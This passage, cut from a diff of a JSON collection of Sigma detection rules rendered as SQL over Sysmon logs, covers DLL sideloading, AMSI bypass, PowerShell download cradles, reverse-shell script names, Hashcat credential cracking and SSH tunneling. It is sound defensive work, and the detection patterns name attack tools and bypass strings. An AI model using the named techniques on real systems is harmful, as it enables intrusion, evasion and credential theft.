'%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE 
'\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" ], - "filename": "image_load_dll_vss_ps_susp_load.yml" + "filename": "proc_creation_win_susp_progname.yml" }, { - "title": "DLL Sideloading Of ShellChromeAPI.DLL", - "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", - "status": "experimental", - "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". 
One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Renamed ZOHO Dctask64 Execution", + "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", + "status": "test", + "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1055.001", + "attack.t1202", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Unknown yet" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (Image LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" ], - "filename": "image_load_side_load_shell_chrome_api.yml" + "filename": "proc_creation_win_renamed_dctask64.yml" }, { - "title": "Suspicious WSMAN Provider Image Loads", - "id": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", + "title": "Fsutil Behavior Set SymlinkEvaluation", + "id": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", "status": "experimental", - "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow shortcuts on 
the machine in order to find the original file to encrypt\n", + "author": "frack113", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.003" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((ImageLoaded LIKE '%\\\\WsmSvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WsmAuto.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Microsoft.WSMan.Management.ni.dll' ESCAPE '\\') OR OriginalFileName IN ('WsmSvc.dll', 'WSMANAUTOMATION.DLL', 'Microsoft.WSMan.Management.dll')) OR (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND OriginalFileName = 'WsmWmiPl.dll')) AND NOT (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%svchost.exe -k netsvcs -p -s BITS%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k NetworkService -p -s Wecsvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\') AND Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\Configure-SMRemoting.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\ServerManager.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine = '')))" + "SELECT * FROM logs WHERE 
((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%behavior %' ESCAPE '\\' AND CommandLine LIKE '%set %' ESCAPE '\\' AND CommandLine LIKE '%SymlinkEvaluation%' ESCAPE '\\'))" ], - "filename": "image_load_wsman_provider_image_load.yml" + "filename": "proc_creation_win_fsutil_symlinkevaluation.yml" }, { - "title": "Potential DLL Sideloading Via comctl32.dll", - "id": "6360757a-d460-456c-8b13-74cf0e60cceb", - "status": "experimental", - "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", + "title": "Xwizard DLL Sideloading", + "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", + "status": "test", + "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Windows installed on non-C drive" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE 
'%\\\\xwizard.exe' ESCAPE '\\' AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_comctl32.yml" + "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" }, { - "title": "Svchost DLL Search Order Hijack", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", - "status": "test", - "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", - "author": "SBousseaden", + "title": "Browser Started with Remote Debugging", + "id": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", + "status": "experimental", + "description": "Detects browsers starting with the remote debugging flags. 
Which is a technique often used to perform browser injection attacks", + "author": "pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1574.001" + "attack.credential_access", + "attack.t1185" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '% --remote-debugging-%' ESCAPE '\\' OR (Image LIKE '%\\\\firefox.exe' ESCAPE '\\' AND CommandLine LIKE '% -start-debugger-server%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_svchost_dlls.yml" + "filename": "proc_creation_win_browsers_remote_debugging.yml" }, { - "title": "Windows Spooler Service Suspicious Binary Load", - "id": "02fb90de-c321-4e63-a6b9-25f4b03dfd14", - "status": "experimental", - "description": "Detect DLL Load from Spooler Service backup folder", - "author": "FPT.EagleEye, Thomas Patzke (improvements)", + "title": "Potential AMSI Bypass Via .NET Reflection", + "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "status": "test", + "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", + "author": "Markus Neis, @Kostastsale", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675", - "cve.2021.34527" + "attack.t1562.001" ], "falsepositives": [ - "Loading of legitimate driver" + "Unlikely" ], - "level": "informational", + "level": "high", "rule": [ - 
"SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\4\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" ], - "filename": "image_load_spoolsv_dll_load.yml" + "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" }, { - "title": "UIPromptForCredentials DLLs", - "id": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", + "title": "Add New Download Source To Winget", + "id": "05ebafc8-7aa2-4bcd-a269-2aec93f9e842", "status": "experimental", - "description": "Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects usage of winget to add new additional download sources", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.collection", - "attack.t1056.002" + "attack.defense_evasion", + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Other legitimate processes loading those DLLs in your environment." 
+ "False positive are expected with legitimate sources" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wincredui.dll' ESCAPE '\\') OR OriginalFileName IN ('credui.dll', 'wincredui.dll')) AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR ((Image LIKE '%\\\\opera\\_autoupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\regedit.exe' ESCAPE '\\') OR (Provider_Name = 'Microsoft-Windows-Kernel-Process' AND CommandLine LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\SpotifyAB.SpotifyMusic\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\'))" ], - "filename": "image_load_uipromptforcreds_dlls.yml" + "filename": "proc_creation_win_winget_add_custom_source.yml" }, { - "title": "Potential Antivirus Software DLL 
Sideloading", - "id": "552b6b65-df37-4d3e-a258-f2fc4771ae54", - "status": "experimental", - "description": "Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "title": "Format.com FileSystem LOLBIN", + "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", + "status": "test", + "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.defense_evasion" ], "falsepositives": [ - "Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused.", - "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", - "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((((((ImageLoaded LIKE '%\\\\log.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Program Files\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\TelemetryUtility.exe' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\plugin\\\\log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\log.dll' ESCAPE '\\')) OR (ImageLoaded 
LIKE 'C:\\\\Program Files\\\\Canon\\\\MyPrinter\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\qrt.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\')))) OR ((ImageLoaded LIKE '%\\\\ashldres.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockdown.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsodscpl.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\McAfee\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\McAfee\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\vftrace.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\wsc.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\tmdbglog.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\DLPPREM32.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\ESET%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\ESET%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE 
'%/fs:ReFS%' ESCAPE '\\'))))" ], - "filename": "image_load_side_load_antivirus.yml" + "filename": "proc_creation_win_lolbin_format.yml" }, { - "title": "HackTool - SharpEvtMute DLL Load", - "id": "49329257-089d-46e6-af37-4afce4290685", - "status": "experimental", - "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", + "title": "Droppers Exploiting CVE-2017-11882", + "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "status": "stable", + "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Other DLLs with the same Imphash" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" ], - "filename": "image_load_hktl_sharpevtmute.yml" + "filename": "proc_creation_win_exploit_cve_2017_11882.yml" }, { - "title": "HackTool - SILENTTRINITY Stager DLL Load", - "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", + "title": "HackTool - Hashcat Password Cracker Execution", + "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", "status": "test", - "description": "Detects SILENTTRINITY stager dll loading activity", - "author": "Aleksey Potapov, oscd.community", + "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", + "author": "frack113", "tags": [ - 
"attack.command_and_control", - "attack.t1071" + "attack.credential_access", + "attack.t1110.002" ], "falsepositives": [ - "Unlikely" + "Tools that use similar command line flags and values" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Description LIKE '%st2stager%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" ], - "filename": "image_load_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_hktl_hashcat.yml" }, { - "title": "Possible Process Hollowing Image Loading", - "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", - "status": "test", - "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", - "author": "Markus Neis", - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], + "title": "PowerShell Web Download", + "id": "6e897651-f157-4d8f-aaeb-df8151488385", + "status": "experimental", + "description": "Detects suspicious ways to download files or content using PowerShell", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Very likely, needs more tuning" + "Scripts or tools that download files" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' 
ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\'))" ], - "filename": "image_load_susp_uncommon_image_load.yml" + "filename": "proc_creation_win_powershell_download_cradles.yml" }, { - "title": "WMIC Loading Scripting Libraries", - "id": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", - "status": "test", - "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Potential RDP Tunneling Via SSH", + "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "status": "experimental", + "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1220" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "The command wmic os get lastboottuptime loads vbscript.dll", - "The command wmic os get locale loads vbscript.dll", - "Since the ImageLoad event doesn't have enough information in this case. 
It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" + "Administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wmic.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\jscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" ], - "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml" + "filename": "proc_creation_win_ssh_rdp_tunneling.yml" }, { - "title": "Suspicious UltraVNC Execution", - "id": "871b9555-69ca-4993-99d3-35a59f9f3599", - "status": "test", - "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", - "author": "Bhabesh Raj", + "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", + "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", + "status": "experimental", + "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. 
spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.\nOne trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.\n", + "author": "Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.g0047", - "attack.t1021.005" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND CommandLine LIKE '%WerFault.exe' ESCAPE '\\') OR (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvcs.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regasm.exe' ESCAPE '\\' AND CommandLine LIKE '%regasm.exe' ESCAPE '\\') OR (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' AND CommandLine LIKE '%regsvr32.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentImage LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ultravnc_susp_execution.yml" + "filename": "proc_creation_win_susp_bad_opsec_sacrificial_processes.yml" }, { - "title": "Write Protect 
For Storage Disabled", - "id": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", - "status": "experimental", - "description": "Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.", - "author": "Sreeman", + "title": "Defrag Deactivation", + "id": "958d81aa-8566-4cea-a565-59ccd4df27b0", + "status": "test", + "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", + "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.persistence", + "attack.t1053.005", + "attack.s0111" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%reg add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\system\\\\currentcontrolset\\\\control%' ESCAPE '\\' AND CommandLine LIKE '%write protection%' ESCAPE 